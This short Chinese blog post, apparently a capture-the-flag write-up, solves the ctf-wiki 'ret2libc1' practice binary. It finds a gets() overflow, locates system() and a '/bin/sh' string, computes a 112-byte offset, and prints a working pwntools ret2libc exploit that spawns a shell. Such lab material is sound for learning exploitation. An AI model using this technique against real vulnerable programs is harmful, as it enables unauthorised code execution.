ret2libc1

ctf-wiki
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/

checksec查看保护机制
开了NX


image.png

把文件拖进ida,main函数,f5,发现gets()函数,漏洞所在地



顺便查看函数,发现system函数,地址为0x08048460


image.png

利用工具ROPgadget,查找是否有/bin/sh存在,地址为0x08048720
image.png

gdb调试计算偏移量为112


image.png

exp

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x08048720
system_addr = 0x08048460
payload = flat(['a'*112, system_addr, 'b'*4, binsh_addr])
sh.sendline(payload)

sh.interactive()

exp运行


image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容